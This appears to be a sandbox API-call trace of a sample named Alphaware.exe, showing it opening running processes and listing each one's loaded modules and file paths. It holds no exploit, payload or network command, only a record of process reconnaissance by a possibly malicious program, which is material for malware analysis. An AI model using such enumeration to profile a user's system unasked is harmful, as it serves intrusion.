CoTaskMemFree (pv=0x783720) [0054.934] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9830000, lpmodinfo=0x269dd40, cb=0x18 | out: lpmodinfo=0x269dd40*(lpBaseOfDll=0x7fef9830000, SizeOfImage=0x6b000, EntryPoint=0x7fef9874344)) returned 1 [0054.938] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.938] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="hnetcfg.dll") returned 0xb [0054.942] CoTaskMemFree (pv=0x783720) [0054.943] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.943] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")) returned 0x1f [0054.947] CoTaskMemFree (pv=0x783720) [0054.947] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb350000, lpmodinfo=0x269ff00, cb=0x18 | out: lpmodinfo=0x269ff00*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0054.951] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.951] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb350000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0054.956] CoTaskMemFree (pv=0x783720) [0054.956] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.956] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb350000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0054.960] CoTaskMemFree (pv=0x783720) [0054.961] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb320000, lpmodinfo=0x26a20c8, cb=0x18 | out: lpmodinfo=0x26a20c8*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0054.965] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.965] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb320000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0054.969] CoTaskMemFree (pv=0x783720) [0054.969] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.969] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb320000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0054.974] CoTaskMemFree (pv=0x783720) [0054.974] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9b80000, lpmodinfo=0x26a4278, cb=0x18 | out: lpmodinfo=0x26a4278*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0054.978] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.979] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9b80000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0054.983] CoTaskMemFree (pv=0x783720) [0054.983] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.983] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9b80000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0054.991] CoTaskMemFree (pv=0x783720) [0054.991] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9e20000, lpmodinfo=0x24b54f0, cb=0x18 | out: lpmodinfo=0x24b54f0*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0054.995] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.995] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9e20000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0055.000] CoTaskMemFree (pv=0x783720) [0055.000] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.000] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9e20000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0055.004] CoTaskMemFree (pv=0x783720) [0055.004] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpmodinfo=0x24b76c0, cb=0x18 | out: lpmodinfo=0x24b76c0*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0055.010] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.010] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0055.014] CoTaskMemFree (pv=0x783720) [0055.014] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.014] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0055.019] CoTaskMemFree (pv=0x783720) [0055.019] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef98a0000, lpmodinfo=0x24b9880, cb=0x18 | out: lpmodinfo=0x24b9880*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0055.023] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.023] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef98a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0055.028] CoTaskMemFree (pv=0x783720) [0055.028] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.028] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef98a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0055.033] CoTaskMemFree (pv=0x783720) [0055.033] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpmodinfo=0x24bba50, cb=0x18 | out: lpmodinfo=0x24bba50*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0055.038] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.038] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="fastprox.dll") returned 0xc [0055.043] CoTaskMemFree (pv=0x783720) [0055.043] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.043] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0055.047] CoTaskMemFree (pv=0x783720) [0055.047] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9b90000, lpmodinfo=0x24bdc28, cb=0x18 | out: lpmodinfo=0x24bdc28*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0055.052] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.052] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9b90000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0055.057] CoTaskMemFree (pv=0x783720) [0055.057] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.057] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9b90000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0055.061] CoTaskMemFree (pv=0x783720) [0055.061] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef64c0000, lpmodinfo=0x24bfde8, cb=0x18 | out: lpmodinfo=0x24bfde8*(lpBaseOfDll=0x7fef64c0000, SizeOfImage=0x3f000, EntryPoint=0x7fef64c12c0)) returned 1 [0055.066] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.066] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef64c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="cscobj.dll") returned 0xa [0055.071] CoTaskMemFree (pv=0x783720) [0055.071] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.071] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef64c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll")) returned 0x1e [0055.076] CoTaskMemFree (pv=0x783720) [0055.076] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd610000, lpmodinfo=0x24c1fa8, cb=0x18 | out: lpmodinfo=0x24c1fa8*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0055.080] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.080] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd610000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0055.085] CoTaskMemFree (pv=0x783720) [0055.085] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.085] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd610000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0055.090] CoTaskMemFree (pv=0x783720) [0055.090] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcc70000, lpmodinfo=0x24c4168, cb=0x18 | out: lpmodinfo=0x24c4168*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0055.094] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.094] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcc70000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0055.100] CoTaskMemFree (pv=0x783720) [0055.100] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.100] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcc70000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0055.105] CoTaskMemFree (pv=0x783720) [0055.105] CloseHandle (hObject=0x21c) returned 1 [0055.117] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0055.117] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x21c [0055.117] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24c85b8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24c85b8, lpcbNeeded=0x41eb20) returned 1 [0055.118] GetModuleInformation (in: hProcess=0x21c, hModule=0x1190000, lpmodinfo=0x24c8828, cb=0x18 | out: lpmodinfo=0x24c8828*(lpBaseOfDll=0x1190000, SizeOfImage=0x17000, EntryPoint=0x11914a1)) returned 1 [0055.118] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.118] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x1190000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0055.119] CoTaskMemFree (pv=0x783720) [0055.119] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.119] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x1190000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Media Player\\yahoomessenger.exe" (normalized: "c:\\program files\\windows media player\\yahoomessenger.exe")) returned 0x38 [0055.119] CoTaskMemFree (pv=0x783720) [0055.119] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24caa68, cb=0x18 | out: lpmodinfo=0x24caa68*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.120] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.120] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.120] CoTaskMemFree (pv=0x783720) [0055.120] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.120] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.121] CoTaskMemFree (pv=0x783720) [0055.121] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24ccc40, cb=0x18 | out: lpmodinfo=0x24ccc40*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0055.121] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.121] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0055.122] CoTaskMemFree (pv=0x783720) [0055.122] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.122] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0055.122] CoTaskMemFree (pv=0x783720) [0055.122] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24cee00, cb=0x18 | out: lpmodinfo=0x24cee00*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0055.123] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.123] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0055.123] CoTaskMemFree (pv=0x783720) [0055.123] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.123] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0055.124] CoTaskMemFree (pv=0x783720) [0055.124] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24d0fd0, cb=0x18 | out: lpmodinfo=0x24d0fd0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0055.124] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.124] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0055.125] CoTaskMemFree (pv=0x783720) [0055.125] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.125] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0055.126] CoTaskMemFree (pv=0x783720) [0055.126] CloseHandle (hObject=0x21c) returned 1 [0055.127] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0055.127] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb8) returned 0x21c [0055.127] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24d36e0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24d36e0, lpcbNeeded=0x41eb20) returned 1 [0055.127] GetModuleInformation (in: hProcess=0x21c, hModule=0xd10000, lpmodinfo=0x24d3950, cb=0x18 | out: lpmodinfo=0x24d3950*(lpBaseOfDll=0xd10000, SizeOfImage=0x17000, EntryPoint=0xd114a1)) returned 1 [0055.128] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.128] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xd10000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="scriptftp.exe") returned 0xd [0055.128] CoTaskMemFree (pv=0x783720) [0055.128] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.128] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xd10000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Program Files\\MSBuild\\scriptftp.exe" (normalized: "c:\\program files\\msbuild\\scriptftp.exe")) returned 0x26 [0055.129] CoTaskMemFree (pv=0x783720) [0055.129] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24d5b60, cb=0x18 | out: lpmodinfo=0x24d5b60*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.129] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.129] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.130] CoTaskMemFree (pv=0x783720) [0055.130] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.130] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.130] CoTaskMemFree (pv=0x783720) [0055.130] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24d7d20, cb=0x18 | out: lpmodinfo=0x24d7d20*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0055.131] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.131] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0055.131] CoTaskMemFree (pv=0x783720) [0055.131] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.131] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0055.132] CoTaskMemFree (pv=0x783720) [0055.132] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24d9ee0, cb=0x18 | out: lpmodinfo=0x24d9ee0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0055.132] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.132] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0055.133] CoTaskMemFree (pv=0x783720) [0055.133] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.133] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0055.134] CoTaskMemFree (pv=0x783720) [0055.134] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24dc0b0, cb=0x18 | out: lpmodinfo=0x24dc0b0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0055.134] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.134] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0055.135] CoTaskMemFree (pv=0x783720) [0055.135] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.135] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0055.136] CoTaskMemFree (pv=0x783720) [0055.136] CloseHandle (hObject=0x21c) returned 1 [0055.137] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0055.137] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x654) returned 0x21c [0055.137] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24de7c0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24de7c0, lpcbNeeded=0x41eb20) returned 1 [0055.138] GetModuleInformation (in: hProcess=0x21c, hModule=0xda0000, lpmodinfo=0x24dea30, cb=0x18 | out: lpmodinfo=0x24dea30*(lpBaseOfDll=0xda0000, SizeOfImage=0x17000, EntryPoint=0xda14a1)) returned 1 [0055.138] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.138] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xda0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="winscp.exe") returned 0xa [0055.138] CoTaskMemFree (pv=0x783720) [0055.139] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.139] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xda0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\winscp.exe" (normalized: "c:\\program files (x86)\\windows media player\\winscp.exe")) returned 0x36 [0055.139] CoTaskMemFree (pv=0x783720) [0055.139] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24e0c70, cb=0x18 | out: lpmodinfo=0x24e0c70*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.139] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.139] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.140] CoTaskMemFree (pv=0x783720) [0055.140] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.140] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.140] CoTaskMemFree (pv=0x783720) [0055.141] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24e2e30, cb=0x18 | out: lpmodinfo=0x24e2e30*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0055.141] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.141] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0055.141] CoTaskMemFree (pv=0x783720) [0055.141] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.141] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0055.142] CoTaskMemFree (pv=0x783720) [0055.142] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24e4ff0, cb=0x18 | out: lpmodinfo=0x24e4ff0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0055.142] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.142] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0055.143] CoTaskMemFree (pv=0x783720) [0055.143] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.143] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0055.144] CoTaskMemFree (pv=0x783720) [0055.144] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24e71c0, cb=0x18 | out: lpmodinfo=0x24e71c0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0055.144] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.144] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0055.145] CoTaskMemFree (pv=0x783720) [0055.145] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0055.145] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0055.145] CoTaskMemFree (pv=0x783720) [0055.145] CloseHandle (hObject=0x21c) returned 1 [0055.146] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0055.147] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa64) returned 0x21c [0055.147] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24e98d0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24e98d0, lpcbNeeded=0x41eb20) returned 1 [0055.147] GetModuleInformation (in: hProcess=0x21c, hModule=0xd50000, lpmodinfo=0x24e9b40, cb=0x18 | out: lpmodinfo=0x24e9b40*(lpBaseOfDll=0xd50000, SizeOfImage=0x17000, EntryPoint=0xd514a1)) returned 1 [0055.147] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.147] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xd50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="baby.exe") returned 0x8 [0055.148] CoTaskMemFree (pv=0x780780) [0055.148] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.148] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xd50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\baby.exe" (normalized: "c:\\program files\\internet explorer\\baby.exe")) returned 0x2b [0055.149] CoTaskMemFree (pv=0x780780) [0055.149] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24ebd50, cb=0x18 | out: lpmodinfo=0x24ebd50*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.149] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.149] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.149] CoTaskMemFree (pv=0x780780) [0055.149] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.149] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.150] CoTaskMemFree (pv=0x780780) [0055.150] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24edf10, cb=0x18 | out: lpmodinfo=0x24edf10*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0055.150] CoTaskMemAlloc (cb=0x804) returned 0x780780 